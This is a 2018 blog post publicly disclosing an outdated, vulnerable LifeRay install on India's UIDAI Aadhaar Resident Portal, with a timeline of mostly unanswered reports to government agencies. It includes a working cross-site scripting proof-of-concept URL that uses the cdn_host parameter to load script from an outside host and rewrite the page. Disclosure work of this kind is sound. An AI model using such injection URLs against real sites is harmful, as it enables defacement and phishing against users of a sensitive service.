Abhay Rana aka Nemo

Aadhaar Vulnerability Public Disclosure

The Vulnerability

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

  1. A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: See issue-62 for eg.

In fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects javascript from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

Fun

The current script allows for embeding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For eg, to embed this tweet:

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
  3. The URL becomeshttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

Update

There is some confusion regarding which version of LifeRay is UIDAI running. They seem to be running 6.1.1, released in 2013-02-26.

The exact version is not relevant to the fact that UIDAI is:

  • running an unsupported release
  • which is 5 year old
  • not updating it despite being notified multiple times

0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them vulnerable to multiple vulnerabilities until they update to a supported release.

Timeline

The vulnerability is still not fixed. Here is a complete timeline:

Date What?
16 Jan 2017 Initially reported to help@uidai.gov.in. No response
21 Jan 2018 Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response
19 Feb 2018 Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in
19 Feb 2018 Acknowledgement from CERT
15 Mar 2018 Reminder sent. No response
17 Mar 2018 Notified NCIIPC
18 Mar 2018 Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018 Confirmation from NCIIPC thanking me for the report.
19 Apr 2018 Reminder sent to UIDAI asking for acknowledgement
30 May 2018 Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in a HTTP response Header.

Published on September 15, 2018 in aadhaar,disclosure,sanitarypanels,13ftwalls